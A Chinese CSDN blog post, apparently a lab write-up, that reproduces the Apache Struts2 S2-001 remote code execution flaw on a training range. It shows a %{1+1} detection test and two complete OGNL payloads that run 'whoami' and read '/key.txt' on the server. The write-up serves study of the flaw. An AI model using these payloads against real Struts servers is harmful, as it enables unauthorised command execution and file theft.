Apache Struts2远程代码执行漏洞(S2-001)复现总结

最新推荐文章于 2024-05-16 05:43:48 发布
最新推荐文章于 2024-05-16 05:43:48 发布
阅读量2k 收藏 4
点赞数
分类专栏: struts2漏洞复现 文章标签: 安全漏洞 struts2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45746681/article/details/108943876
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

前言

为了加深对struts漏洞的理解,记录下复现struts漏洞的过程.

一、Struts2远程代码执行漏洞(S2-001)复现

在这里使用墨者学院的靶场进行复现

检验方法

在这里插入图片描述

在表格中输入%{1+1}看返回结果是否为2
在这里插入图片描述
返回结果都为2,证明账户和密码表格处都存在这个漏洞

利用漏洞进行命令执行

输入以下代码进行命令执行

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

在这里插入图片描述
显示结果成功执行命令
接下来执行命令cat /key.txt获取key值,提交墨者学院
payload为

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/key.txt"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

在这里插入图片描述
在这里插入图片描述

qq_45746681
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Struts2 远程代码执行漏洞S2-001分析
st3pby的博客
01-05 832
首先来了解 OGNL 表达式,OGNL(Object Graphic Navigatino Language)的中文全称为“对象图导航语言”,是应用于Java中的一个开源的功能强大的表达式语言(Expression Language),它被集成在Struts2等框架中,通过简单一致的表达式语法,可以存取对象的任何属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。OGNL进行对象存取操作的API在Ognl.java文件中,分别是getValue、setValue两个方法。
Struts2 漏洞复现s2-001
weixin_51220765的博客
12-14 982
Struts2 漏洞复现s2-001 原理: 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行复现步骤 1. 进入vulhub目录下漏洞环境的目录 cd vulhub-master/struts2/s2-001
Apache Struts2远程代码执行漏洞(S2-001)复现
最新发布
2401_84545618的博客
05-16 908
​ 进行过响应处理后,在invokeaction()方法中会通过反射方式调用对应action里的execute()方法,这里获取的是LoginAction中的execute()方法,而后调用invoke()方法调用。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。提交后,发现其执行了表达式,得出结果为2,并显示在对应的密码框中。
struts2漏洞_Apache Struts2057远程代码执行漏洞复现
weixin_39661129的博客
12-10 208
网安引领时代,弥天点亮未来0x00漏洞简述2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞(S2-057/CVE-2018-11776)。该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中...
Struts2_001_RCE 漏洞复现
ADummy的博客
02-04 404
Struts2_001_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 ​ 我们来了解一下Struts2 中的validation机制。validation依靠validation和workflow两个拦截器。validation会根据配置的xml文件创建一个特殊字段错误列表。而workflow则会根据validation的错误对其进行检测,如果输入有值,将会把用户带回到原先提
Apache Struts2远程代码执行漏洞(S2-016)
weixin_47493074的博客
09-24 941
Apache Struts2远程代码执行漏洞(S2-016)
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
Apache Struts2是一款非常流行的Java Web开发框架,它为开发者提供了构建MVC(Model-View-Controller)架构的便捷工具。然而,就像任何其他复杂的软件系统一样,Struts2也存在安全漏洞。其中,S2-045 和 CVE-2017-...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者执行恶意代码,从而危害到网站的安全。 S2-016 漏洞是由于 Struts2 的 Ognl 表达式语言解析器存在缺陷,从而导致攻击者...
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
struts-2.5.16-源码+示例(S2-057漏洞演示环境)
08-24
Struts 2是Apache软件基金会开发的一个开源MVC框架,广泛应用于Java Web应用程序的开发。在版本2.5.16中,存在一个名为S2-057的安全漏洞,这是一个非常重要的安全问题,需要开发者和系统管理员密切关注。这个漏洞...
Apache Struts2-001 RCE 含漏洞利用脚本
乌云__SS的博客
11-09 289
0x01漏洞描述 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 0x02影响版本 Struts 2.0.0 - Struts 2.0.8 0x03漏洞复现 首先测试漏洞 发现...
Struts2-001复现
jiji_king的博客
07-05 161
个人笔记
Apache Struts2远程代码执行漏洞(S2-001)
weixin_47493074的博客
09-29 618
Apache Struts2远程代码执行漏洞(S2-001)
Struts2 远程代码执行漏洞复现S2-001
Welcome To Myon'Blog !
03-14 1114
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型与视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。
0x1F. Apache Struts2远程代码执行漏洞(S2-001)复现
qq_31679787的博客
10-16 312
s2-001:WebWork 2.1+和Struts 2的“ altSyntax”功能允许将OGNL表达式插入文本字符串并进行递归处理。这允许恶意用户通常通过HTML文本字段提交包含OGNL表达式的字符串,如果表单验证失败,该字符串将由服务器执行; 通过账号处输入%{1+2}提交后得到返回值 3可判断出s2-001漏洞; 通过构造poc得到查看根目录,发现key文件; poc: %...
Apache Struts2远程代码执行漏洞(S2-001)复现,腾讯网络安全开发面试
2301_79655589的博客
04-03 989
… welcome.jsp … 登录成功 , …web.xml文件部分配置如下所示,这是一种J2EE配置文件,决定se
墨者Apache Struts2远程代码执行漏洞(S2-001)题解
zr1213159840的博客
01-07 441
这题明确说了是什么漏洞,咱们在网上找利用即可,并且参考链接中也提供了相应的信息 官方这个说明说,在表单中填入%{1+1}如果回显为2的话,说明存在这种漏洞,最后我们测试发现,在密码中输入这个式子会回显为2,说明存在这个漏洞,其中的账号随便输 接着拿下面这个exp直接获取key %{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{“cat”,"/key.txt"})).redirectErrorStream(true).start(),
apache struts2框架命令执行漏洞(s2-045、s2-046)
01-11
Apache Struts2框架是一种流行的开源Web应用程序开发框架,但曾经发生过多个命令执行漏洞,其中包括s2-045和s2-046漏洞s2-045漏洞源于在处理远程表达式语言(OGNL)时存在安全漏洞,攻击者可以利用构造特定的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值